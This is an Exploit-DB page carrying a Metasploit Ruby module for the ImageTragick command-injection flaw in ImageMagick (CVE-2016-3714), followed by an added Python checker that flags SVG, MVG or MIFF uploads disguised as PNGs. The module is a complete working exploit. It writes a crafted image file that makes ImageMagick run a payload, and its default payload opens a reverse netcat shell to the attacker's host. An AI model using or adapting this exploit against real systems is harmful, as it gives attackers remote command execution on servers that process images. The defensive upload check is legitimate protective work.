ImageMagick 6.9.3-9 / 7.0.1-0 – ‘ImageTragick’ Delegate Arbitrary Command Execution (Metasploit)

  • Author: Metasploit
  • Date: 2016-05-09
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/39791/
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ImageMagick Delegate Arbitrary Command Execution',
      'Description'    => %q{
        This module exploits a shell command injection in the way "delegates"
        (commands for converting files) are processed in ImageMagick versions
        <= 7.0.1-0 and <= 6.9.3-9 (legacy).

        Since ImageMagick uses file magic to detect file format, you can create
        a .png (for example) which is actually a crafted SVG (for example) that
        triggers the command injection.

        Tested on Linux, BSD, and OS X. You'll want to choose your payload
        carefully due to portability concerns. Use cmd/unix/generic if need be.
      },
      'Author'         => [
        'stewie',            # Vulnerability discovery
        'Nikolay Ermishkin', # Vulnerability discovery
        'wvu',               # Metasploit module
        'hdm'                # Metasploit module
      ],
      'References'     => [
        %w{CVE 2016-3714},
        %w{URL https://imagetragick.com/},
        %w{URL http://seclists.org/oss-sec/2016/q2/205},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
      ],
      'DisclosureDate' => 'May 3 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        => {
        'BadChars' => "\x22\x27\x5c", # ", ', and \
        'Compat'   => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat bash-tcp'
        }
      },
      # Each target is a template file shipped with the framework; the comment
      # notes the ImageMagick conversion that originally produced it.
      'Targets'        => [
        ['SVG file',  template: 'msf.svg'],  # convert msf.png msf.svg
        ['MVG file',  template: 'msf.mvg'],  # convert msf.svg msf.mvg
        ['MIFF file', template: 'msf.miff']  # convert -label "" msf.svg msf.miff
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
        'LHOST'                 => Rex::Socket.source_address,
        'DisablePayloadHandler' => false,
        'WfsDelay'              => 9001
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
    ])
  end

  def exploit
    # SVG is XML, so the payload is HTML-entity encoded for that target only.
    if target.name == 'SVG file'
      p = Rex::Text.html_encode(payload.encoded)
    else
      p = payload.encoded
    end

    # The template carries the placeholder 'echo vulnerable' where the payload goes.
    file_create(template.sub('echo vulnerable', p))
  end

  def template
    File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
    ))
  end

end
```
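The module relies on ImageMagick identifying a file by its content rather than its extension, so a text-based SVG, MVG or MIFF can be handed in under a raster name such as msf.png. As an added defensive example, not part of the Metasploit module or of ImageMagick itself, the Python check below sniffs the leading bytes of an upload, compares them with the declared extension, and reports whether the real format is one of the text-based coders this module targets; the magic signatures, header patterns and sample inputs are assumptions constructed here.

```python
import re

# Added example, not part of the Metasploit module: reject uploads whose
# bytes do not match the extension they claim, since ImageMagick dispatches
# on content, not on the file name. Signatures below are assumptions.
RASTER_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Text formats handled by the SVG, MVG and MIFF coders the module targets.
TEXT_FORMATS = {
    "svg": re.compile(rb"^\s*(<\?xml|<svg)", re.I),
    "mvg": re.compile(rb"^\s*(push graphic-context|viewbox)", re.I),
    "miff": re.compile(rb"^\s*id=ImageMagick", re.I),
}

def sniff_format(data):
    """Return the format implied by the content, or None if unrecognised."""
    for fmt, magic in RASTER_MAGIC.items():
        if data.startswith(magic):
            return fmt
    head = data[:256]
    for fmt, pattern in TEXT_FORMATS.items():
        if pattern.search(head):
            return fmt
    return None

def check_upload(filename, data):
    """Classify an upload as 'ok', 'mismatch' or 'unknown'."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = sniff_format(data)
    if actual is None:
        verdict = "unknown"
    elif actual == ext or {actual, ext} <= {"jpg", "jpeg"}:
        verdict = "ok"
    else:
        verdict = "mismatch"
    return {"declared": ext, "actual": actual, "verdict": verdict,
            "delegate_capable": actual in TEXT_FORMATS}

if __name__ == "__main__":
    # Constructed samples: a genuine PNG header and an SVG renamed to .png.
    samples = {"photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
               "msf.png": b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>'}
    for name, blob in samples.items():
        print(name, check_upload(name, blob))
```

A mismatch verdict with delegate_capable set is the disguise described in the module's description and is a sensible point to reject the upload before it ever reaches a converter.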